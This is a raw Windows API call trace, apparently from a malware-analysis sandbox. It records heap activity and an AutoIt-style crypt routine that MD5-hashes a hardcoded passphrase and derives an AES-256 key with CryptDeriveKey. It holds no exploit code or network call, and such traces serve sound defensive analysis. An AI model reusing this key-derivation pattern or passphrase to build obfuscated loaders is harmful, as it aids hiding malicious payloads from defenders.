[0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0114.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0114.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0114.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0114.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796d68 [0114.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0114.614] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0114.617] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0114.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0114.617] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0114.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.618] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0114.618] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0114.618] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0114.618] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0114.619] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.620] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0114.620] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0114.620] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0114.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0114.620] CryptHashData (hHash=0x41ac640, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0114.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.621] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0114.621] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0114.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0114.621] CryptDestroyHash (hHash=0x41ac640) returned 1 [0114.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0114.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0114.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0114.679] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0114.679] 